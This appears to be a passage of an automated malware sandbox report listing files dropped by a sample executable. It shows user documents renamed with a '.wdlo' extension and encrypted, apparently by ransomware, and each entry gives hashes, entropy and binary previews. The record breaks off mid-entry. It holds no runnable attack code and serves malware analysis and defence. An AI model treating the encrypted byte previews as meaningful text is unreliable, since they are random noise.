                  Size (bytes):2430
                  Entropy (8bit):7.917324138736801
                  Encrypted:false
                  SSDEEP:48:1FnjJ5QjJ2/iKS78NjfegorEzRAb9ICiMPKiJ4njfPdwxV8J3nD:NKd2/i17gygD9YICiM9J4njfFf1
                  MD5:3CAD29183C327174AFE884658F3B30D6
                  SHA1:3A5271C1B0AE4783ACBDA9DCF48D64D6563A9C32
                  SHA-256:D691BEEA5EBFDAA76584D1136B4801088E895DE96B660322FB66B511EE1EAA1A
                  SHA-512:BF7F778442223A382D667B260D2C5FE7F232DF2D8920C54BA223EBFC79218EB1BD433053A6AF5BFD6AFCD7B561BCF5A90C67C5DA2575A7AEEACF654E8A59FB1B
                  Malicious:false
                  Preview:<?xmll......R.d...R.[...1E'..T[.Xr....p... d.sG*J....i..xO..,P......./*.[^..%.Z...4..S..z%....wz.lw...8g..\..k...(6.2.3.....+X....3<.N.....+7~.lcx..B.<...15U.....t=..n..X...G.#.....*......c......2*.i..@..I`.....i..T...dNr.5.<.9tf.........)I.'.*...h..V...x..n.YR.. ..F.....,..PQ1..Pl(...hnV...,..Ih.1d.. ...wu.[...m.qYl.*....g^D....B%.c.............7.$.kh.....SI..(...p`.Un..X.N..v..1......,.;.C..2d....y....HT..\6..R..F..e....g.......S]...rq.1d.m....).&.@?.3.....[m...ce.E4.?.N...0U.c.v8G....4..b.PX...GC?....T.b...H.N.^.p..->....!..c..O'.1..[.P.St..:a........Emf..g${yfz../..|.>M.|.M..+...}....(......U%..1.....p....`....*...hb...L[....7(J;_>+.}..h;~..Q......S....d...g}....)e$.. ..D....B#.k..........=.H.....1R...j.0.XR.b.....0.N....D... ......N..Tn...c...+-?...:^%\^.........~rRot..d5.U2z.`1yc....N.H..7...x.....Go...8....6.:.Q.....d.,./Q.B.53...."......&=f.c.....W1....*.....L..t..Cg^p]:i...F...b...Rj_...y.W..=.F..\..v..7..3m........<c.c.M.6...if

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\AKJIMDEQMB.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.871757659575084
                  Encrypted:false
                  SSDEEP:24:+dOUgF/o+F3NBy0Gqf+xwwvZJB+H/gHOG8AvuD18SzQ1ywT/93zbD:0g5VfFfIrO/gn8A0U1ywTF3nD
                  MD5:97FA4C601D936582485653EA2B263EAA
                  SHA1:832A65B1583CC812E890527B82D316BB9F699912
                  SHA-256:665A01510AE4291B262F1253DA997A200AAF640921B176DEC18272E87617C188
                  SHA-512:E53505294C2F9232E51871ACD40A50B8FB3202A1CE5179A1108D18F5778A93505E16145EEA54964F1828F2381C653A76DE1683E3734B485A1D0A1697F04075DA
                  Malicious:false
                  Preview:AKJIM....._z_.R..Hf.@.h...l.~..|D...P.....y..O.....f...J...@._..J. g7.G.6...`VM....<X.!..w....z....Z..vS+t....|U.cN..~...YZ....\..nT.,`.Z/iVGFEx. .A.O..o.}..........p.fd>......*.q%.z..~F...t....4...k.WQ.Z.....N.F/....O.........1$.3`..y<..,w../....hZ..i.h...F}_.......^.z.....+...\..-...5.N.t..J..nU..1Sm..4.....x....X....z..M.=....'1...'...X.6.. +,o.+5...\B....|....Qkm..vRf=V.J...+xr...-..>".K.4`.B...^...f.'.UNn..C..|..M.u+"......FN.e...P+;.Lo.....$(.Er.}..W4.P.....,.r.._.y..gw8.O.z..X..9..=.~.....U.U.X.~......M..y:..o/a#.]`.;8...c.p.}.... T..*.....K.'.6^.T..@...r..t*v......f%.@r..TW....m..%..)~mX.w.dG.d.j.]..%.....;.x.N...;"K-..4.l.[.w....,..F.....[]..Z6h.......h.......0..|..L.<..g3..@...=......s.tL.=...t.J....w......h,..>..6.........0.#t..e.._.}.d.q;..d....}.]0. Uo`[.#m...}sd.~.c.F6..PX.E.. \...b....]..JBb.m1S.!.:.q6Y+....L.G!...U...-!VF.."q/...p_..5..H.l..1.M...H.....YC.sG...x..n..a.@...2f..H...K..3..P..Ue..OeQ.....=.y ={q....gp..

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\AQRFEVRTGL.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8646210106692385
                  Encrypted:false
                  SSDEEP:24:Vs4eQ89X75GeLZLzH7qOcWV1PCzygKG5Alg84zKNCeMWTN4BTvt5P+SlaFZ5aiQg:Vs4n8zGeLZLnyWV1PC/5Alg7zICe7q1I
                  MD5:8AEF512713AF35DDF3165B31DAE45843
                  SHA1:5D31DF7403183EA3212BBB39FA2EDA6CA84DA364
                  SHA-256:8C7A88BA8B0ADE24A3DA99E8F6799C4F6C8D9AE082114D7B55499FED97151BE2
                  SHA-512:4A2C158E7929A002F99B9815DFAC85F18CB0592CE50C6C448DAB86C7A617A49A622F934D581AC7C417A5A6D771E1EE54D3DF6E61DA0875583D15FD33E2D8F8AB
                  Malicious:false
                  Preview:AQRFE\q2q...f!......}\.'.K.`A...r..2.G.>...D8y.\...#.o-..w.Uq.!#i-W........2..Z.....H.?..U.i}`..*A$.8PL.I.w.T..Kn..).%y..-...&.jD..O.:..S....?#..(..BgZ.....i....cY..=..._.f...$.E..y./!...7@I..9.y...:?$.X..s..z.Cc3>...Kp..d...`....F.?B..TY.#Q.5.a............].Nl..........?..+iv.0....*.....D~\..t...%Qk......|.......62F.....=..lD..q ..b.cf.o.5@Q.W.......@.D.....h.@o2..nz.."p.pu..`.]..5...".a..A....e.._. 3-..*.O.#..(8..R......XK...'l.......1....6/..F`?..X0b.....)..p...D..T..?.R.>...i<.........<JH...N..R{...f......./...]*.....jX......l..........a:...@n...CqMH...~..........)C.L.[6:...P.h......<L.S;.(.l.kQ}.kP.p..Sf..Bp...(e`H..r.:c...V...yW...Y...,....2....6^[...M.H$^M...BN....n...J.}..}.}E0A..{b?...s..L.F...q...UxKJ.\.....hem...H@.......@.....d.ovD...........$....l.ucvp..dd.n....%,:.u.....+S......X.c......diz2..a..U....{6...."....._......em.j......0!.G...#..,:.d...t.#d^...Ye.S.. .5O...:8w...J.&L]......*.m...}r.8......-.F:.z...%.2+..9.

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\AQRFEVRTGL.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.859923637536022
                  Encrypted:false
                  SSDEEP:24:Vqp/3reZfAba57zkKp14YoVy0FV2zVYGAYEUknSsNn/DXLKRnj3FRj3zbD:VAQfMapzJ14i0T2GUuN/DXLKVjFRj3nD
                  MD5:7C93BF56AC6CF847C1C5CD1E4CF6F2CB
                  SHA1:8D617CE3A1DAB6CD0F1CFACDBBBB5DDE41BB8776
                  SHA-256:DBEC5216E1521BDF48B6F2622A9999009502E202E58877FA05123184C8AC928C
                  SHA-512:01A02880C82188792E069D71BF28C98EFDC5DF1DFA0CC7168436F95AE3C790433C20FDAA34CA6A30728AED76D86E4EBF63D10AA61E934D7C42D985EA98E26194
                  Malicious:false
                  Preview:AQRFE.,...r\..YPj,dJ.@...A.Z.].....<6.h0..1..|O.s..b.J.......bF.F...&...?...r .....{.....I&.y.>...r..J....Al.".8\.KcZ../a.v7..Q?.*..xR.#_-\.4,2=>....gwS.._[....S`#..u.^V~.G.C......w.f..N...&YK.@.......U4y.To....:wY.WL...q.FIm.:..mQ8!.3.a{w....R5.....!.M..p.W..x.5izD..z...+.3..G.5.'..&r......%.vSK........,....[.S_.e.."..^.o.1n0Y..Q....1.j;.......Z....2......f.."..u+..*.j..|A...Mz.,..C..f...L`8...r%.....90v.3j.......9%.r.."..Ep.0.q....4T[....H..0....g_..M..+..~..P~.y.*7.>(wJLAR....5.....f."1.q. .....f;.}}....+T..V....f_.e..z..0/..-....`......'...ho...J..,..."c1I..=..l8.gT.......+|.B2.K...c!....(....._....E.)"o.h.....}..;.L.Y...f........y.wT...F*......L...Ks\...v..a....4.}.....!T.6..j ......T.._.... u.C?Z.~.Z..l..m}..x...KP..(*!..=..]....C] 7O`.@....I.>.=>u...../..{...'El.LP....n,..k.q........5.7.......d...&..9...\...F*D.p...Q......G.d.0&....}{.|...[...b..\S.X.)0...t....A}.1...c.n..e/qw[..?.q..o!8./a{.'.9.....5.......)'g.@b.N.S~...&..+n..

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\AQRFEVRTGL.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849596247463308
                  Encrypted:false
                  SSDEEP:24:VufkDObKX+8VYH0cdTyYKME0lrTV2XTmAEw9ldA8vbkLRjpCID2Rz13zbD:VAGOI+8VTzlu6Tm4LAnLRjTD2R13nD
                  MD5:1CD8E7BC8556176B1CA468B70549CD8D
                  SHA1:9F0F8B5C56040E7D7ADC45DF56E1426EC50BB612
                  SHA-256:83C00AD63A143F06B5BFCE7166E586176B8918A5C4D6BF5A9B230821719C22F3
                  SHA-512:E420FD47A75015DA7E1129D11F0526247C7ABC88B3071411AC5C642306610F0436AA0CAC0745080C4CE758152783363D49CDF049894E30B233FCAF35DDA18EF8
                  Malicious:false
                  Preview:AQRFE.P....`X...l[%.7...g.#~.W....~.:ovS..b.l........Y...V.................L.kN....jxKs.R8.5.?.R..C...9)."......6....Iq.O.X}e....r.yg'.....KTP'p...5.....P...4v.1......>..D.?..f*......8S...9.Yv.a.H3.l.....^.1{.*..K...B.._IlA..Vi'|.....\_....Bu..'...b..gs.F.....{.L.R.D..a.U8.rkzPC.t!o.Dm.:n..Y.F.)....x6.A6.`...hl..&..i1k..0.I)..9..K....t......d.2..-...t5...A..O~..p>G.E8M"^?..M...c;Wv....i.....XSF+..$..S.}.)y*Y..[.u.<.i.....Y..s.&!.6...1.w....hs..;u...z.+@..T.p.4.v.}.N......*.g..~..l.<ac..G...RK.........J.=...N.{.3]6w..../..!....X.F...>u..Cw...h...y.\...A.{z.C.[V........`............D...`Cror..D....R.^.u.^...z...jc.i$......H.s wW.O...0h.s.e.Z..&......;.f.....,.....=^.^.Xp.a..-Jo.....B?...|.?7..F.N>a._..e._...8........D.....o?.8.A+4..Z.h...rW.L..l..Z..b....F.#W...Y.B.:......n...*..a '..H.L.1C.,.bI.L.4yj..8.{v...=.....s..Z..=^:...w..M.(..M;......M...H3l.....#.V....]O....d...Z'P.*..4.|...._..N]'...B.x!.5.#..bD.!...K..!.Ig..B}.p....D.(.M. %I.v$

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\ARRJGEXJRL.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.835183352866824
                  Encrypted:false
                  SSDEEP:24:YZTwU/63m0U3iSgs4AKz7HFDtaaDB5ajOYzQS8t2f/XhbMzUiZqMID3zbD:Y5/6Wt3iA5I7dtak26Yzu232YD3nD
                  MD5:0B59161959B760426834971CDC45A3F6
                  SHA1:94443F5BDC0647E4B0E6FE75C5241953867F2D0F
                  SHA-256:B586449AC798CDA8C487239208FA05A4A0D07646C24541DCB0B7C22C1C8896FE
                  SHA-512:45C88AFC428A1D8546B32C9403661FF16C3B0E3780E03C39067288C428BC9C218BB252F9DAAEFB03D1E76BB0260309CEDE46CC5ACFFEF1D6B5EC3606B0ACE730
                  Malicious:false
                  Preview:ARRJG.].2...[...R...!Vr.n.g./.,.l..[@..{y.....Y.+O."sB.&.......4a...;|.P.S..^cW...V.;t..OyPm...m.S....?v.b.{N.43..(J..$..J....h.\M.P.J$&....g.....Y..7[W..._8...#<.c.....^S.N.X....<'D].....t...U......p."g...k.qo...qwYi.B-......$k..L- "M~j..r.p.[E..g...e.....X.c|......k..A.X6a../...k.g..9/.....MW.........1B....x...?.......\.}.+...|...n...QT.p..w.f....\c.p..WH.;...|._.X.....&u.V]l.1X.F.^9/..........C.#?....&.L....\.R...z.Ac%...O..u...6....XK~?....F+...q...$..).9I\<..=M.3...{.M.G..Y4..j..{V....e.W....ZF...lSm.Gl....*.ET..........nc..r.....P.....h.8R.`"..&..Y....-..a...9(........|..&A.4..7RF...L...^...S.....M....3<.O..[..v...m..s%.Y.3e.]..0.B.-.9-IC...o.8b......6V:.hjD.h.m.I....!h....H.z\./.r.$E...eFk..(6F.gfWc.....W.Dfw.I.R...(^....a[.V..=..U......).Ex........t....T...K.o.c .U.B+....L......R..ag..a.........../t.....*y..o.N"..V..H.x22..$;Y.!...=..]....i.3.[........GU.p].*cnHJ..&Q...S..w........L...N.iA.u.8../....j....b.s...#...

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\BWDRWEEARI.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858076302521836
                  Encrypted:false
                  SSDEEP:24:2r6pKjXheG++o/+2Lvxd3KH2PzmmScuAobKq6A9xjdxP5qTSZ2XTrIvEppNCHLY0:9pZr/lGWPzmmTcXOTSZ2jrIvEwV3nD
                  MD5:8165E9AFC3611813EEA1C4ADD110FC48
                  SHA1:DB0964114D616CD1669BA1583F64314504B11C65
                  SHA-256:92C3C26E87CFD19A856CF7AAA71F6B9D8D7D87128D734017BC4A762B8AC2806B
                  SHA-512:84B73F981CA24BD8E5687B6CA83F9407D0868CD511F8BD0774EE00811FA19E71EB2A7C2E4CDFD4EFC884478C73C9D6C7D84530540DB0FC6C035A5ED6FEB766A3
                  Malicious:false
                  Preview:BWDRW.:vk...A}..\.`.Hn...vRr.-...W.1..O.b..[@.Xd..b"...P..R...:..e.....S.t...u...i...d..cxu;A.. J.QRg...|...m."_!......C..p..P..%.........Y.y......T.2B.......sC.`.!...T.Z..IZ.mgW...v.....%q....^z........#....<;..x......a>7+,C.2.?.z..j..W....$.SW.........G...Y..~..7NGo.+...M._......2.6..M.0f+.d..,K..c..s`....>A.94.J0Bs..^.. ....i....".N..Fz$.h.C. .j.x..3[..*5.L} ..h.]u..o..0.i.X....+..f..`!...@..0..1.6.....*V...p.dz...n.o?...RKU.P.j..s].%....... ...>H(rX...._...0.......1.l.-*'...tAG]p.(..K..5m..*F.u,-.j.M.OQ....q`..2.....[.L...a.,b.x.YV.....a.*]3._.u.v.[.0\i..8.)!./......9.EZ..E...T..i....s}SV.q..;.....q....E]>..(..:....M."....#k.D.R.qq.....0.9&..../..F.5...V....hx..XW.7J..3...E._...f. M...5\n*j.B....;'.......!.1].n*.....E......f..[...Q.e..G.6.....J~v?O.P.G..X.*...ZwT..J*........_..TG..=.q.>3..M=.....|'...mB...QT...W?.Q.U..*........k....#....F..G...{.-PGb...&d...8.~..H.. .q..R]0.;.#+....Z."..%...'P.>..+...bB..C."..../....o9jO^.!..~{.

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\BXAJUJAOEO.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.86494769973924
                  Encrypted:false
                  SSDEEP:24:5vk6GKEHO5x4QwqYxh7njqXfMyAmrGs0C+O/xEmyM72rB0tqiTj0pPCCg3zbD:9zzas/a7jqPMyAmrGsYfMqc0ECg3nD
                  MD5:098D6A858843AD1E5BE80AFEAC827E49
                  SHA1:1BD337B0DB1706CB4CAAA07C329C63C2D649E9DC
                  SHA-256:06CE40F654B69C4DDCB8E95E43A78AC5A48B2E7D728C8464A6A562ECC4DF0971
                  SHA-512:03BACFE8E47C2FA13ED5C9CA643FE26CA74FF0A042E39B212275D13937EBEFA6D26D290F7F8E21418A50CA536E6382287B6FA947D6AA8ACAEFC2533D9FDDDA98
                  Malicious:false
                  Preview:BXAJU.bv...U*.a^.....R(A]..=......WvnL.7. $..}.y.w5$..P2....K.O....8..<.#.}j>...z.k.'.c.:.:.....C..]..._..e.....;'..Yg)....=E..0q..%....UW.(|4...pB.[.G..E=t+<..wS:\.J...<.WN5_.\..i~G...l.:...n....xs{.==\..kp.....p.A.~|.ez...........(.@B..{.0........:^......R3.........k.xEZ..;..G....l...4*w..O...)..f.f....._......s.8.D.w..3r..ON..\Z..`....."....cklH...c....r .D...Y...8.`n#.w.q...2..~....).'b/...!...f..0jq0....O....q.1*...^.|>f..4......o.>...7\....&.>;.I.x..TE..k......A.........].....Xh........O.O.SV...*..#..We.SD'..gm.'..{..Y....c....? 3.|}I.9.s.4.......$.B.....9...0.>.....8..[..>..n.....Q..i....gb...$..s..~]..n.o^.2.%.....-..."R.....i<ur.U.|...O..4.5..^2....P.6Q^o.}{...:..f.h....'...%n...c..aI..W........(...D..i.... ..Ld..Zf.z.w.!...j..|$R.=.U./.i...M......}....vA.....z....}....z.+z..b....M..v...YY.0@.D3&.T...d.....E7."!.........gI.5....._.QTJ.^.I..3..r.yy|\.....4.v.:@..mu2.k9.o.Tr..\9>....IsG..9.U,.....h.-*H)..}...[.%...'....)].d....

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\BXAJUJAOEO.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8594922445358355
                  Encrypted:false
                  SSDEEP:24:n2Zvz30VVPx3JlGNBDQ93+KwHUDt4D/Jt+DAj7Y+HIn75cNZf5DtF2qXsU3zbD:2h30/9bcDQkKwHCt4L+DAjA75CRtz3nD
                  MD5:0E8854F4F6E2824324705D8070DF3173
                  SHA1:50E4AD099B0A22620B3B4BDB8225AEB3278B74D5
                  SHA-256:E5BA2A30D14E3CB283FDA77F02C205DAED44BB88E8D55B73D4EE1AC116C46E94
                  SHA-512:60BB84A7F740198E2B189B9C3E46A84071719A62A907832D80D5496BF517B7C986D9F4498C9FC090F437368A6B54DDB04D2F19CD4B3BC7127DD687D1EA0CCDF7
                  Malicious:false
                  Preview:BXAJU..j...w...[.L'...+..86.....VI.=.w..t..tY.<K.C..,......#.C.....7..xg..AF.Ns.Q.f.`..D....Zc....Z...u..7a..GT..X....2..e.$.....]G...^.;.[4.uNb..uqHZ.+s..~4q.a};...Pg;...'Q....AV../Am....=.2.Nb.oW|....a3..P5...>...`p.]E.....4O%.l..F..D{Qs..I-s....U.q......e..F...=....s0.&....7.e....B.S!.U.ln..... ..\v9..H....C.Oj:h.....@..!.....K..Gd....Hi.j.N....Y....gJ..L-....<.S".0....B..,.01]...R&%..Cq...._....f...ZkF._<[.._..O..........Y8r.K"_R|G.....k.....av....1.|..z:/>Hx,.a...m....!Y...F.qt.[....hh.H?.(}...|R.iiG|.....&.RU.bc<.....L..i~..4RF...9...].(.....c#..o.0...$n.P...E....3..0.b....r...iU."._....f........p-..M..6.......8.-C1...i.(.{.lcB!k@.Cl...q............!.....O...F...e.A....^............p,..[..O........4.l......dP.h.7.....)...$..,.....#...~...^H.[.,.*t&.f.'.2..`.j.c .WLJ<.'KN.P..M........,mvt......6D...~e.vr...c....E....]..c..F..w..SK..HE.......)].....d....m.....Yj.LdJ.o:{...c.h...3.......n.....W..;.........*.2.sS....m...7

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\BXAJUJAOEO.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8448123723839505
                  Encrypted:false
                  SSDEEP:24:3Kedkv1cWdHLGNJkt1u4AzCsDT0IiZu8tTHwGkcleuQ6n8LH7v6GV1Pq63zbD:3jc1c4HqNOtNsIhQGi6n8fv6GV1C63nD
                  MD5:97E87D1BDD390119872A6B10F4211CCC
                  SHA1:C1765B44B0E33C54CCFE525DC6DAFD51EE70F64F
                  SHA-256:ED3896FF03D636C31E26D781CBF259D079C6CDDF9CFB4A71AA5BBC93AFABE587
                  SHA-512:A12E10E510AF7205722CAACA0E8C4B5A183F7A146EC3C68BFC6ABE24BB32F40B15FC41CC9A580496A9A3CE1D85CD58BB01E3FF7B0A9031E234822F20209C9A16
                  Malicious:false
                  Preview:BXAJU...O..#9..4h...p..Nb.......N......f.7...0}...[.JXG.#I.i...".....P.?..B.\X.\/..............>K...X...E.t..T..:...#....n.-.)..5.....&{(e.k...J......N.....L.H.-..&. G:|...p4.=..%..L.8#!..`.m....F:.J..P...W..}..xe...w....E.HZ.o.D....3..I...hY.......wLy.DW<...<.....|2H>c\}....S.d..T.{.K;F..`.t?.+@.m.......a...Y|.......$.BM..Z.(....WE.*..Q$K..0..E..........O...9..L.aG.....+.8.~=.....$.^.GX5s.....F"...b......n....3.Sb.,..*:e.....;Gm....5.....`...]zXi%..j,..1{6<..]$...H..N.d?....V..C@DI.R.O.n.'.|..h._b..5.o..d../....C.D...4..B)^Wu1....../.X.1.*...$n.xfts'y.......k...2/.H....S#.l...0*...,.!|.}NiZ...a...1[l...1].....7.;.....GG[;A.TT;~.{..W.Vbw.....t...g$..i....'Q......J)..Tz)5.(.#..n..`u......B....n..s..*.d.[SLTD.5Y...h..,....z........U...>.."j..i.\t;..|.K.e.!./.z....u./..8..A..f..lG.d.;.(..&...NW..D.$....w`.w.h......0w?...?{..+\....p/E....$.......r...p..wf...[.#..3l..O.A..#.X~?K.\K...'..F`..%.........g...YJ...9...-..r.'.7niQ.p..N....4D.......Tu[NE.

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\BZXCAHGGQG.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8346283325045345
                  Encrypted:false
                  SSDEEP:24:4BSQt7ZGDj/Jeg8pB+nLWuRr5qSicnShSecRyKRY+ePhDG7061Q3u2xEp3zbD:4BSQmDj/v8v+nv5qShSPcYKRroK061QE
                  MD5:B09EB76EA2C1F06E5F0BD70894607E04
                  SHA1:A1A7F6086808A4B297DF24EB4222A850C731B80E
                  SHA-256:2D0D7C9B35E755DE6FF2F811A5D91CCF603797BD17CBA00B7BF22E87D29FC2F3
                  SHA-512:7741255A8C645BB524EDB2E653B174457A2C5B46430B23B516689120A5254F07679C12AD49224513F521D689E0F34B31848080285759864D7F78C64D90160F80
                  Malicious:false
                  Preview:BZXCAt.VFz@@....8.@....308.#.'%...O.az..1=Z.}.CAeV..9G.wZ.x.9...............*.!...............?......L2....a..6ne.8..$.4.|..rh..{.'"S4...8\..j5....)..K..r..Z.......#.2X....e....[...;.'.f`vi'7D.m~..)..Ck....3..x.Q../R.<..F...9J...'.+l.E.....AD..Lf$.|2.[y...6.zOM..^..B!.......}.0<..b....[......3B.a..5..+.)M..6H.D..yh>Y.;.5........0..9.x...r.-...giF....9...8.<.../Ty...S.....T......F..o...RsM.)..s....$.u..P.T}...q'EI...a...,;.n..`.[...9.L..[&.j1..j..-..T........s..0...)b+...:..>.V...3k.RM%|.6..h9|...?Hd.%.8.......dW...h.{..&2.....4..E..cY..N..O.(.>`..K.4....=......K.0...$.4.....(...j.O.......... "f{..x.H.d..,K.s=QvOk..tP.O#.oR$.<....tPG..HN%.#.:{..9.UG..[L..f%.`)v..._.F..[.YJ..Q......WI..Y..T......)]U.....MO+..F.`0..DA{..!.J3.;.;..Cy...gV.....rI%.&.C(..i.Y...H..0....4O*|[.Q=.L1^}w...D{.2.....I..D.2......;..4.._...t..lo..~O..1.X..8.k..6..H|...j..-0..P.?..X...9.=.....).}.gU..U.U..Q.qn.d.9@.%M%.....c.e....Q2Kc-..<%.VmT.....o.....2Qr.h6..@)D..(%!.

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\GJBHWQDROJ.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.843512332388988
                  Encrypted:false
                  SSDEEP:24:CidOm2+PYRvVWUeVm4MEW82l4j/EZ5nHaWfGF/Bh+0thP2tdBLllaJb89k3B3GFT:VbskU4BMxlOeHaxphpTPUrLllOTk3nD
                  MD5:FC2E4F912D4D394EBB308DC6D16D1239
                  SHA1:C18BDA96359CDE818B645E5804534D6630C57EBF
                  SHA-256:DA257533CAE7379A3036FDD7371EAC670492FB7EDEE5043EB1512AE291247EA9
                  SHA-512:C6BFDE96C55483DD549C5ACF7CB60679D5944D9C983B2284CD8E2A1982F6A9BF13AFC2F8717D934676778F5CEE0596B6AFBDB96D7B7E2918070FC686E412339E
                  Malicious:false
                  Preview:GJBHWW.X..0..u....'....M|.6.'g.. .n|v.HO...u..7.\...o.U.1....I..*..g..t.U......V!..w.;[.a. h.^.6...=.....f2ygH7.*\.....Z........L.I.O.l.Syl...wziV`9L..9....'...Y=.4.....x...\?"..=k|......b.2|A...D+y....r...U..&Y.......uj..kw._...5...&i.l.ldIS...)0K8.Xid30#..-?2.1! !kE.6.m...-.....C....+....x.l.6.t..Uw.s*..bp;4+....E3..!.c......L..nHK...k..#...T]R..A.....9Q2.@.*_t..P)....!...r...nE.A;.i.U..iK.KQ....Xeu..n.9.....=....:.K..#..(p-.]D_.m...0Q\....d.....,?s....\H.%V..h..n.............P1............).....F..!U'f...).d.i)..a 9...Sd.O=J..1..}E.....X...J..K.......K.W...W7o.)........jn.2..6..Z..3t).Y+.@H-y....sI..9A...\.3J.....-7..*.,.iv. ..x.>..r../....^5..LQ.h..).L:.C..,.....,.SF9....E.c=...ae.B[.$Z..V.^.d.-. .S.y..$.kQ..a.EG.|.....u.#.."......ZI..s....p....6..y.n..{.o..E....j.'..G......g..p%...;....j.`XA..b@..{.a....q.q..+.<....2...!'..<.-..U.c.6.CtpN..........D6..#....:....&.T...x..w.(..c.=T..;..-............R...~..q..t...P...8...o.._...~.e.

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\GJBHWQDROJ.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8525921841476665
                  Encrypted:false
                  SSDEEP:24:W3tjr+Vo16i6YEE610PJEcW7rQ8X4SkDrWGsxkrP6J9vFhI4wAr3zbD:wtjZFXV6aP2cWvQ8X4SkGFWPsdhI7ArT
                  MD5:FCC9315AFEAAF04127DFE01A1D8F5DA1
                  SHA1:21877A9610CCF9E033EC7405FD2C6086FFA1105D
                  SHA-256:BE4AE184C3F6144701555AB0CF3DCF34E7B9066FADBA1EE49031B0A40A57E416
                  SHA-512:489089F4EFDAD6C163ABE96875785F7A24196B93FC89270E3436382BB1C2147B84C0CDE1FAED845E403ADC363D2885A0205265E4781FFBD49E908EF26E237C3D
                  Malicious:false
                  Preview:GJBHW+..l-t...>.<S.}..7.N..`.c.N]#Z...1$.+F.......{vp..ko..~..Z..!.f6."_9.=..UU..Q...8..NQ..xd. <C..l.>.)p...7.q+[.%.P.fR..."..r/..(...h....+.Yjw..#.>..5.2.vg...;xvc.....jDH`.>.!.v!.....<.`pq..a....).v..E.~%|7.0..!8.i.h...03A ......ql.1n...i... .w..8f12.=...<...D.M=.G.Z.w5...7...c.=.R.5:..............A.2.~...4..$R`k..vQ...pS..."d=z1..L(....G~..b..\S!.7.p.....F)I.*...\.M..(..t v..K.........^..1......%}C(.e..J..N..x...".#..._.EG.iK..5.'`..]#..Ic./.........'v`...J...Y....M..),+...s.S..^.D.y[&!.Ze6YP..ne.[!..(.....`..96v...h...C....ZkK.?.h...&s".... ....'..... ...=...B=C.=x.$....g*..>8...K..1.B........RK....W{..$.D.e..,....)}..u.r..$..3...........i..x....r..eJ.Y..>2G.k.{.@..^.q...8....>..=...S....j.4..a.......]p.I....%'..YI"P.....K..F|^*.6Ad.6|.k}FiGtr.*..+"b...... 'z zzx,.]..a>..U..\.0.Z.#\~.....X../eX;...-....X.S,_..S........U(..`........}trMr9...\5......Y.H.!.>.r#N_..\...[#I....o....'R.|e6..N....1........../.....B...#AeTSub.kK$.*D..m..=cc

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\GLTYDMDUST.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.844117085659355
                  Encrypted:false
                  SSDEEP:24:GcEHqGxb+eTVxzSoD4KqxfJYiZnRGob1eaVFNpLhccMqr8Y9ny+kjjZi2RrUZ93D:LERV+epxGebYRGobQaL7rPAjNRrUf3nD
                  MD5:2898CDE2E8F81318FEF8E92F26477D96
